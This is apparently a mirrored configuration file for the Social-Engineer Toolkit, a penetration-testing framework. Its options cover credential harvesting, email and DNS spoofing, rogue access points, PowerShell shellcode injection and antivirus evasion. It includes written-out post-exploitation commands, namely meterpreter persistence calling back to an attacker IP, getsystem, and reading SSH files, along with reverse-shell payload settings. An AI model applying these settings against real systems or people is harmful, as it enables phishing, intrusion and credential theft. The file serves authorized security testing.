mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-12 22:12:31 +00:00
278 lines
14 KiB
Text
278 lines
14 KiB
Text
##################################################################################################
|
|
##################################################################################################
|
|
## ##
|
|
## The following config file will allow you to customize settings within ##
|
|
## the Social Engineer Toolkit. The lines that do not have comment code ##
|
|
## ("#") are the fields you want to toy with. They are pretty easy to ##
|
|
## understand. ##
|
|
## ##
|
|
## The Metasploit path is the default path for where Metasploit is located. ##
|
|
## Metasploit is required for SET to function properly. ##
|
|
## ##
|
|
## The ETTERCAP function specifies if you want to use ARP Cache poisoning in ##
|
|
## conjunction with the web attacks, note that ARP Cache poisoning is only ##
|
|
## for internal subnets only and does not work against people on the internet. ##
|
|
## ##
|
|
## The SENDMAIL option allows you to spoof source IP addresses utilizing an ##
|
|
## application called SendMail. Sendmail is NOT installed by default on Kali. ##
|
|
## To spoof email addresses when performing the mass email attacks, you must ##
|
|
## install Sendmail manually using: apt-get install sendmail ##
|
|
# ##
|
|
## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches. ##
|
|
## ##
|
|
## Note that the Metasploit_PATH cannot have a / after the folder name. ##
|
|
## ##
|
|
## There are additional options, read the comments for additional descriptions. ##
|
|
## ##
|
|
##################################################################################################
|
|
##################################################################################################
|
|
#
|
|
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
|
|
METASPLOIT_PATH=/opt/metasploit/apps/pro/msf3
|
|
#
|
|
### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
|
|
METASPLOIT_DATABASE=postgresql
|
|
#
|
|
### How many times SET should encode a payload if you are using standard MetaSploit encoding options
|
|
ENCOUNT=4
|
|
#
|
|
### If this options i set, the MetaSploit payloads will automatically migrate to
|
|
### notepad once the applet is executed. This is beneficial if the victim closes
|
|
### the browser, however can introduce buggy results when auto migrating.
|
|
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
|
|
AUTO_MIGRATE=OFF
|
|
#
|
|
### Custom exe you want to use for MetaSploit encoding, this usually has better av
|
|
### detection. Currently it is set to legit.binary which is just calc.exe. An example
|
|
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
|
|
CUSTOM_EXE=legit.binary
|
|
#
|
|
### This is for the backdoored executable if you want to keep the executable to still work. Normally
|
|
### when legit.binary is used, it will render the application useless. Specifying this will keep the
|
|
### application working
|
|
BACKDOOR_EXECUTION=ON
|
|
#
|
|
### Here we can run multiple meterpreter scripts once a session is active. This
|
|
### may be important if we are sleeping and need to run persistence, try to elevate
|
|
### permissions and other tasks in an automated fashion. First turn this trigger on
|
|
### then configure the flags. Note that you need to separate the commands by a ;
|
|
METERPRETER_MULTI_SCRIPT=OFF
|
|
LINUX_METERPRETER_MULTI_SCRIPT=OFF
|
|
#
|
|
### What commands do you want to run once a meterpreter session has been established.
|
|
### Be sure if you want multiple commands to separate with a ;. For example you could do
|
|
### run getsystem;run hashdump;run persistence to run three different commands
|
|
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
|
|
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
|
|
#
|
|
### This is the port that is used for the iFrame injection using the metasploit browser attacks.
|
|
### By default this port is 8080 however egress filtering may block this. May want to adjust to
|
|
### something like 21 or 53
|
|
METASPLOIT_IFRAME_PORT=8080
|
|
#
|
|
### Define to use Ettercap or not when using website attack only - set to ON and OFF
|
|
ETTERCAP=OFF
|
|
#
|
|
### Ettercap home directory (needed for DNS_spoof)
|
|
ETTERCAP_PATH=/usr/share/ettercap
|
|
#
|
|
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
|
|
ETTERCAP_INTERFACE=eth0
|
|
#
|
|
### Define to use dsniff or not when using website attack only - set to on and off
|
|
### If dsniff is set to on, ettercap will automatically be disabled.
|
|
DSNIFF=OFF
|
|
#
|
|
### Auto detection of IP address interface utilizing Google, set this ON if you want
|
|
AUTO_DETECT=OFF
|
|
#
|
|
### SendMail ON or OFF for spoofing email addresses
|
|
SENDMAIL=OFF
|
|
#
|
|
### Email provider list supports GMail, Hotmail, and Yahoo. Simply change it to the provider you want.
|
|
EMAIL_PROVIDER=GMAIL
|
|
#
|
|
### Set to ON if you want to use Email in conjunction with webattack
|
|
WEBATTACK_EMAIL=OFF
|
|
#
|
|
### Web attack time delay between emails default is 1 second
|
|
TIME_DELAY_EMAIL=1
|
|
#
|
|
### Use Apache instead of the standard Python web server. This will increase the speed
|
|
### of the attack vector.
|
|
APACHE_SERVER=ON
|
|
#
|
|
### Path to the Apache web root
|
|
APACHE_DIRECTORY=/var/www
|
|
#
|
|
### Specify what port to run the http server off of that serves the java applet attack
|
|
### or metasploit exploit. Default is port 80. This also goes if you are using apache_server equal on.
|
|
### You need to specify what port Apache is listening on in order for this to work properly.
|
|
WEB_PORT=80
|
|
#
|
|
### This flag will set the java id flag within the java applet to something different.
|
|
### This could be to make it look more believable or for better obfuscation
|
|
JAVA_ID_PARAM=Verified Trusted and Secure (VERIFIED)
|
|
#
|
|
### Java applet repeater option will continue to prompt the user with the java applet if
|
|
### the user hits cancel. This means it will be non stop until run is executed. This gives
|
|
### a better success rate for the Java applet attack
|
|
JAVA_REPEATER=OFF
|
|
#
|
|
### Java repeater timing which is the delay it takes between the user hitting cancel to
|
|
### when the next Java applet runs. Be careful setting to low as it will spawn them over
|
|
### and over even if they hit run. 200 equals 2 seconds.
|
|
JAVA_TIME=200
|
|
#
|
|
### Turn on ssl certificates for set secure communications through web_attack vector
|
|
WEBATTACK_SSL=OFF
|
|
#
|
|
### Path to the pem file to utilize certificates with the web attack vector (required)
|
|
### You can create your own utilizing set, just turn on self_signed_cert
|
|
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
|
|
### to the on position.
|
|
SELF_SIGNED_CERT=OFF
|
|
#
|
|
### Below is the client/server (private) cert, this must be in pem format in order to work
|
|
### Simply place the path you want. For example /root/ssl_client/server.pem
|
|
PEM_CLIENT=/root/newcert.pem
|
|
PEM_SERVER=/root/newreq.pem
|
|
#
|
|
### Tweak the web jacking time used for the iFrame replace, sometimes it can be a little slow
|
|
### and harder to convince the victim. 5000 = 5 seconds
|
|
WEBJACKING_TIME=2000
|
|
#
|
|
### This will remove the set interactive shell from the menu selection. The SET payloads are large in nature
|
|
### and things like the pwniexpress need smaller set builds
|
|
SET_INTERACTIVE_SHELL=ON
|
|
#
|
|
### Digital signature stealing method must have the pefile Python modules loaded
|
|
### from http://code.google.com/p/pefile/. Be sure to install this before turning
|
|
### this flag on!!! This flag gives much better AV detection
|
|
DIGITAL_SIGNATURE_STEAL=OFF
|
|
#
|
|
### These two options will turn the upx packer to on and automatically attempt
|
|
### to pack the executable which may evade anti-virus a little better.
|
|
UPX_ENCODE=OFF
|
|
UPX_PATH=/usr/bin/upx
|
|
#
|
|
### This will configure whether to use EnableStageEncoding to on or off within Metasploit payloads
|
|
STAGE_ENCODING=OFF
|
|
#
|
|
### This feature will turn on or off the automatic redirection. By default for example in multi-attack
|
|
### the site will redirect once one successful attack is used. Some people may want to use Java applet
|
|
### and credential harvester for example.
|
|
AUTO_REDIRECT=ON
|
|
#
|
|
### This will redirect the harvester victim to this website once executed and not to the original website.
|
|
### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
|
|
### THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
|
|
### SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
|
|
### TO CHANGE.
|
|
HARVESTER_REDIRECT=OFF
|
|
HARVESTER_URL=http://thisisasite
|
|
#
|
|
### This will allow you to specify where the harvester log file goes when using APACHE and specifying it to ON.
|
|
### By default this will be in the /var/www/ directory.
|
|
HARVESTER_LOG=/var/www
|
|
#
|
|
### This will turn off the ability to log passwords in the credential harvester. NOTE that this isn't a 100 percent
|
|
### science. It will only filter on things that are password oriented and not present them. Otherwise it will still
|
|
### show them.
|
|
HARVESTER_LOG_PASSWORDS=ON
|
|
#
|
|
### This feature will auto embed a img src tag to a unc path of your attack machine.
|
|
### Useful if you want to intercept the half lm keys with rainbowtables. What will happen
|
|
### is as soon as the victim clicks the web-page link, a unc path will be initiated
|
|
### and the metasploit capture/smb module will intercept the hash values.
|
|
UNC_EMBED=OFF
|
|
#
|
|
### This feature will attempt to turn create a rogue access point and redirect victims back to the
|
|
### set web server when associated. airbase-ng and dnsspoof.
|
|
ACCESS_POINT_SSID=linksys
|
|
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
|
|
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
|
|
#
|
|
### This will configure the default channel that the wireless access point attack broadcasts on through wifi
|
|
### communications.
|
|
AP_CHANNEL=9
|
|
#
|
|
### This will enable the powershell shellcode injection technique with each java applet. It will be used as
|
|
### a second form in case the first method fails.
|
|
POWERSHELL_INJECTION=ON
|
|
#
|
|
### This will allow you to change the Metasploit payload to whatever you want based on the powershell alphanumeric
|
|
### injection attack. Specify this if POWERSHELL INJECTION is set to ON and you want to change it from the standard
|
|
### reverse_tcp attack. NOTE: All payloads use x86 - process will automatically downgrade to 32 bit.
|
|
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_tcp
|
|
#
|
|
### THIS OPTION WILL SPRAY MULTIPLE PORTS THROUGH POWERSHELL IN A HOPE TO GET A PORT OUTBOUND.
|
|
### NOTE THAT POWERSHELL INJECTION MUST BE SET TO ON.
|
|
POWERSHELL_MULTI_INJECTION=ON
|
|
#
|
|
### THIS WILL SPECIFY WHICH PORTS TO ITERATE THROUGH TO DO THE POWERSHELL INJECTION. NOTE IF YOU ARE USING SET
|
|
### PORT 80 IS USED BY THE WEB SERVER. THE REST OF PORTS SHOULD BE OPEN. CONSIDER IF YOU WANT TO USE PORT 80 TO
|
|
### PLACE THE LISTENER ON A DIFFERENT SERVER.
|
|
POWERSHELL_MULTI_PORTS=22,53,443,21,25
|
|
#
|
|
### This will display the output of the powershell injection attack so you can see what is being placed on the
|
|
### system.
|
|
POWERSHELL_VERBOSE=OFF
|
|
#
|
|
### This will profile the victim machine and check for installed versions and report back on them
|
|
### note this is currently disabled. Development is underway on this feature
|
|
WEB_PROFILER=OFF
|
|
#
|
|
### Port numbers for the java applet attack linux/osx attacks, reverse payloads also allows you to specify
|
|
### what payload you want
|
|
DEPLOY_OSX_LINUX_PAYLOADS=OFF
|
|
OSX_REVERSE_PORT=8080
|
|
LINUX_REVERSE_PORT=8081
|
|
OSX_PAYLOAD_DELIVERY=osx/x86/shell_reverse_tcp
|
|
LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
|
|
#
|
|
### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
|
|
CUSTOM_LINUX_OSX_PAYLOAD=OFF
|
|
#
|
|
#
|
|
### THIS WILL USE A CUSTOM PLIST FOR PERSISTENCE ON OSX
|
|
ENABLE_PERSISTENCE_OSX=OFF
|
|
#
|
|
### User agent string for when using anything that clones the website, this user agent will be used
|
|
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
|
|
#
|
|
### The way the set interactive shell works is it first deploys a stager payload that pulls an additional executable.
|
|
### The downloader is currently being picked up by a/v and is actually somewhat hard to obfuscate because it does
|
|
### similar characteristics of a download/exec. If you turn this feature on, set will download the interactive shell
|
|
### straight without using the stager. Only issue with this is there may be a delay on the user end however still
|
|
### shouldn't be noticed
|
|
SET_SHELL_STAGER=OFF
|
|
#
|
|
### Disables automatic listener - turn this off if you don't want a metasploit listener in the background.
|
|
AUTOMATIC_LISTENER=ON
|
|
#
|
|
### This will disable the functionality if metasploit is not installed and you just want to use setoolkit or ratte for payloads
|
|
### or the other attack vectors.
|
|
METASPLOIT_MODE=ON
|
|
#
|
|
### THIS WILL TURN OFF DEPLOYMENT OF BINARIES FOR THE JAVA APPLET ATTACK AND ONLY USE THE POWERSHELL METHOD.
|
|
### NOTE THAT POWERSHELL_INJECTION MUST BE SET TO YES OR NO
|
|
DEPLOY_BINARIES=YES
|
|
#
|
|
### THIS IS FOR DEBUG PURPOSES ONLY. THIS WILL REMOVE THE CLEANUP FUNCTIONALITY WITHIN SET TO DEBUG FILE STATES
|
|
CLEANUP_ENABLED_DEBUG=OFF
|
|
#
|
|
### WHEN SENDING EMAILS OUT, SET WILL ADD A URL AND KEEP TRACK OF THE EMAIL ADDRESSES ON EACH UNIQUE LINK. THIS WILL HELP YOU FIND
|
|
### WHO CLICKED ON THE LINK AND FROM WHAT PERSON / EMAIL ADDRESS WAS USED. THIS WORKS ON ALL WEB-BASED ATTACKS AND SPEAR-PHISHING.
|
|
###
|
|
### NOTE: IN ORDER FOR THIS TO WORK YOU MUST ENABLE WEBATTACK_EMAIL and APACHE_SERVER TO ON.
|
|
TRACK_EMAIL_ADDRESSES=OFF
|
|
#
|
|
### THIS ALLOWS YOU TO TURN A DNS SERVER ON IN SET. ALL RESPONSES WILL REDIRECT TO THE SET INSTANCE WHICH CAN LAUNCH ATTACK VECTORS
|
|
DNS_SERVER=OFF
|
|
#
|
|
### THIS WILL TURN ON BLEEDING EDGE REPOSITORIES IF YOU ARE USING KALI LINUX - USE AT YOUR OWN RISK, THEY TEND TO BE UNSTABLE
|
|
#
|
|
BLEEDING_EDGE=OFF
|
|
#
|
|
#######################################################################################################################################
|